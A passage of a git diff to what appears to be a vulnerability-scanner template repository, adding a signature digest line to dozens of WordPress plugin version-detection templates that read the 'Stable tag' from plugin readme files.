b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022047c4354ed8ab212c9d18f98866a0644a8a928e8c1321d7e07e6e0506fb4b40d702204f19bf26dbb848838e450df6072f18624f01a8a6196ad80548fe61392ac1cd05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index feed730ee0..a529c61e4e 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207b4ca0b81c93a2defdf33127afd6f01945236ae9870f60ed5b3444f23d1d76f4022100d1423f6d9ef637a47a6f3401ba8c81f99b568c18ff04ac3e04a0f815501f9a51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 9b2841e7ca..f6bc902d1d 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c8cec09ba26db6b9dc6fc40e4d1a9090b8c234bd125efe700917225f8434c2eb0221009e93db15ed2eb9af62be13c49ab156059eca7eb535d15d708c1b4d72a1f9e1d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 42be14c5df..17da2f8490 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f178ea9dae4ecbae54e9c87124c40a1490d9d32b81eb9bf5b00be4ac9809b92f02200b9ec47f3316dde4796784f7cd209596d38edb7fbffda87adca330b791243f39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 4e0cd86c3f..26784ab1ad 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201b46a8d4c01003dd24efee90b83e1e07de32c8495e59b745ed2f48d95b85536e02200ac0ee19fcb061988128896ca19bd91dff1808c4283010380d3aaa5df5fde5ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 59eadc5e6e..d4bced4d70 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a82bee0cbca727065688eb417aa5267685c8fbf8472da965d7ac9b30e87917e1022100e3665d146feeb1cbbfd8e2a45e01c4799411606e61efe206cb5e1eaa96efd6a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 41f7a0075e..c49be25871 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fef148d5f18f2a13f07e18f4137acac4c0acec55596da216108c18fc7c75a4c502201d657fc799c52a48615c832a0b8aa90a39c702400b8dc004720b4f98074d548a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 7e35a3fb4f..9e0b9ff129 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220592c21718f2c8502732c8b5686222f522239865a6a3613c8e9a6a0014e1abf6f022100d9c015d07c51165514ca44c5342f483f697798c285ce48d3ddc315a06cc5f85b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 18c2a7586e..cc31b18cf8 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022058b5b5e01686f6e4f967666574975d65aab145d61fde5bb95995a03fd2fe2c8e022100bfcac36b36295016d91567abb1bc7e90bf6a59a85772bc786ab6f4f779f37533:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 6bc2aa78f9..4a2c880b4b 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b0d36b7b93b2a34edbc3f13e5ab27d07bc1ccaddc1a166182673f319f3a7aa3f022039aaeaac73f571f483568ac76b83e4ebb912c1c1509712e198538707f1978579:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index a43d3352a2..07f105f7cd 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a7fcf3f34fc4327ae3fe92b6ffab65b1e14896cbfb5579c8342d7460b160027202205a9764a5a846b2d149b941680d92682e381454e1fea0fe5a11f88836b5f96aa7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index e7db9944e4..00e04ef37b 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022042d766d2ca34efc9455977b968a985247df0461131c5a1a1453db2747e14d66c02202731dbd29107f20847f8b514c8d96b2b2013db6465afbabcaf76644e2dcc10cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 268bd7b9df..40e5c319ca 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207661259767b34b575c3b62d6def13cd26904ad715fab277357425e4a326044830220012d94b2db3c8916a45df942b44230acb2d880e74e129da04e93c66a00c07e23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index d7fb2209d1..c4d839e025 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c619ee565f33f559dadf3dba433519710b2bcdb31b4d713f6cc0eac8f3295a390221009b78203c2ad655b5cedf92a7b0c4d7292c8f8d01e778b0bcb3ce5fbe26e680e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index a1641d4632..aea1101042 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009995fd1eb739624af5a45081492ab9d789affe57a992452a4f47ce6704c7ac45022100bc1c1bfa6f0ab285895fbc40f822ac143491707bbd617db7205aea313a6e19b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 3b6542683c..0a88fc0f69 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008f19e8a397e663c259634f359aa6ec0b254ac2af59ad58ceb8e4c1b71b0941d902203a2864482e54678285edaadbdfaff33d0e9f50bfcaf475159e4c8da64b8de3e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 969c280ee1..4c087ff8a5 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b5aa206522d9ea62c9d51ba7249f518820cd5df11978faacfda970551ff3f17402202489de3fa827c139ca96809beffac4c7642e1f1bde349dab360563c992865e42:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 1c97c422e4..6b5782d2be 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ee1f736d50f9ecec5c138c0a73ffae8a9c5142fb818267a5d0ba862a51d18b12022100f11b30423a218585a0bfaedd909f4794fc2d8c5c51f85413a3c9f15aead781f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 7d861cf06a..d67cff872f 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b3a49e7fb981579e01c93dc357f4d20d7c8cf891dee9d16aa4b2ff4e2660e7ee0220010c2c571ccee17657ac3caa9a65c59d8fbf999d1546e0e332a1fc7b56edf22c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 00eb1e2dfc..897db998b2 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d8e7dda59b35e9989dca02c40f48ccdd09a7240da618a3e00f13e07fa2e830c9022059777de1078533ea523befb42579cae67f3564dbaa424104f4d99fb06ab94067:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index f089ee37d3..889d236f7e 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022071607a99422a141c2686dc0bf8ed60377eead1c5853333ac768c118a625a9016022100ceadca0a1dae32fd1cadbed1a39a9f0dccbe2bedac631809f2129cb3c7d3178a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 492d66db68..0851b7658a 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202ad50a3405937407abeddf664490774cc80cf9bbe8e4ec863857747826b094a6022100c65cdf238d1631b4d2159aa8c6c4a028b99aa0c00e02ebd7dfe12f873a1ff385:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index f8903fa3db..41dd965306 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210099fd7a9477854fdb7b3bce3067ecba37226c2931d212bbf66aad2250b94693cb022100f361f0b13b75f7759f226cb41703f76bb8bcdda4b0d72d251cf7f474a30e028f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index ae2451ca38..55992a26c7 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100de04fa11258c970c7bb3fb1c6144443d9dccd135f82bf2f9e7dba194364831ef022070e86318488874c7bf3ed0d8eff6bb1a499be0282aaccf07e6bc2279d92311ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index dcc61d1255..885c0137b3 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204b2971a4d5c5fc7b3474fcfd531ee7c4fd2aa3ebf2741167b167031adb2f7db00221008d5e9281f65890211cca4d56d6d5f532beb6bba336b3b824aa88dadac737cec7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index d1d2c1c1d0..dcdf934164 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ca9dba54217b08157feacb92e37ed545654228d016901673c312ebb3551d0e6c02201cf02875a1802f283528c105221aa4f2fc454f28f66a57175dfb730581d3c879:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5f5e8afed5..9f39906f8a 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202ad6de2a233dafc7625eb6fd8ff8fd820eaa5c720bc94e9769634173f105f102022100de84a3d9af25f4948cf5c878dc4366c7f73f8f008e2b309f0f54a4e20571f9f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d15634bb2b..cb74c3fef5 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009e3ec6f149f2ba7beec14b0fbbcc3eeaa72e6411c8903a0225ef51cd8a99521202203033825b4d0512ecb4b2709c83a76090573013ff368863e4a0f8f02ba08a73e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 7da04be5d3..bcd7f74100 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207026962b81161d5292fcada1fa9c85f19411792c8a17bee9f0ce908c2af0dd1b022014907a94a8a9eca2a0f5c825fe93ebb38ab2450eac0b07ff609e08b83f0b8a77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index a79253cec5..ea496cb295 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220289e42219da0d13ec48ab7281b2f1d577bfad1bbde809df114b9aef38415f533022070d626db6bb824f71f371fe142ba68ac43276030de1e46f19b55d4cc62beee2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 77fc04a220..45eb468521 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a4fd4aeb28aac55922c0eb40ff7d8b735cbc20011a6d7cfed23d07652427eb0d0220028130de15abb7ed32471193b742643d223ee700b82e1f5d7fc8f9256d418984:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 733f9ee453..25d90913f3 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100eba49122193da2aab31e9d3077b0a8b8d13418307a20ea25d0de04bc36fcabc1022100ad93bd4236bdeba28055abc6bef96216fbdaec7b05499359d72bc8057258ccb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 0af08f0ac0..e79a8be24f 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220137eee58c2c9c04e94d9c46b4657ade0b6cd89e329a8d99802849e9b9c4dc152022011e702089521fd1e20ecbf1988f28d9ae807f9da4953baf96ef33f9669624140:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 1e4c77fbca..ed8a84f22b 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c81853967be2659ebd05c24fabfd97ac91f9f642cdea6f6327e229e15c39d969022100f31e3c7a3b6dfc6e73df5b752b3219817e1b0efafd143d4f9b79f5d3c64f008d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 295e3fe82d..6bef664046 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206db41b520c857f4e7ad5aca3f5c9a19d6c1ccba72159d6cecae7db07b6c97856022100b911a26c2ca1953d016743f82a40aeae51de7347cfa0de1ece0ddbb1560ca360:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 862f73201f..12b03224d0 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205f4ca3f41e3ffb41eaf05c3e0f9611b5638712164049a8136a2848e89b853d1102205998fe4be599c8cdfee9b10422f96139cc4029928b633af530ba8377e7a22d17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 711b64f9d0..4fdf86e629 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a680246bd12dcfa75d62fdc6fcb2c462bdff3cc57cfcc6fcf69f390c749dd24602206a8589748436fc20c7c66168ce3a60e7fc3befdfb4c6fa8424a44173d57d0875:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 58ddcfab78..5a543076a0 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022051e2fe0555414d68749b25b5212c418cfeec08fc80db65a336f8ac94228cf48402202a14651e39db848db5f14b6d74e894e5df6ebcb8b1caf7a6288246075625529b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 305d74e8ea..23713a1d5c 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022021dfeb19002a0e6c866fa6ddd4c98e4f4aff1a22ba7a56a15202e3ca7b2b5034022100b375dff94d0f11349179b0974725a3e92786abbb7860a562166b0aebe73008ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 668162fc4e..be375ec15c 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bdb772cb5e39f4645125b28d1bd5227f3dbc72c4ab8f97774d6be7266b5b1f9c02200e4e140db8e420c775e4316a8f51bb4d01724f3c3cde5a5587b10ab100d2d2b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 4f99876557..70fc943b30 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205828c6db9dbf3f4775cd055f5602ad5d3793d7d8c3219232d1ad1c19a5cb47f60221009ac64c04f4ce119ac907421a2cf065a3b9d62ab108481dd9d6be958ca2b04ace:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index a0d2554492..b522b83946 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008eb7bf8c61745a818ca8782f998dbc7ea5300cb3aedd67a17b499c758742322e022017428cdd58736b9cd46053485732e51bf00b183c3b400eb39cfffb072e8d161e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 4e5046273d..a793a544de 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022008757aff10f4a9efb2d144bfdfba39f8e49ea4e5dbc3c2368f7f62c27e3aa2db022024c6359f5433e11b347ace9539cdb5c2894283acc394c316ecc245339c7c2af8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index f44cee7980..6fa22f1dde 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220625c16f54831eec427a9a0b9cc3cafcb1552407fcbb41f0e811abfdc83c78cf0022025dd46c94b7744563c0b9b0042bc230eb82c03bee8724600f9dc19febfaa16f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 39130db767..2d06be71f6 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205b6fe202630eafa3669553a0145d2604b00f10da73e8eae8db07746e9a9a422402210080a51dc11070b12488ad5570653488aea87ce08b8fb64bed483b12724221e759:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 39c497073c..5127f19bf0 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b61a8f91a784d0085339bece7855ef2a03750a9639c617eb116192e77f3fcacc02202467e1e4f9af31d82c6d89739b40665a8f381e3ccdb072c4d2134d0489b333b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index b848288b55..132cf63ba3 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008706c7fdac4f2de7e30649085d5f8f244f520b8c29620a8ad1e648995d6f47f902200c1c255a9b5b30b2c9555d4734cdaed377664623db2275d78816912b78116c8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4d10178692..95f1d8b297 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b159fe992022851b4ae6ad222f45f4ccfddcc1984a7472b0423dc51d84cb81fa022100df218c3f3060d9cd7497f6458742971d426128a18ab4114d1a79ad9ee64213b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 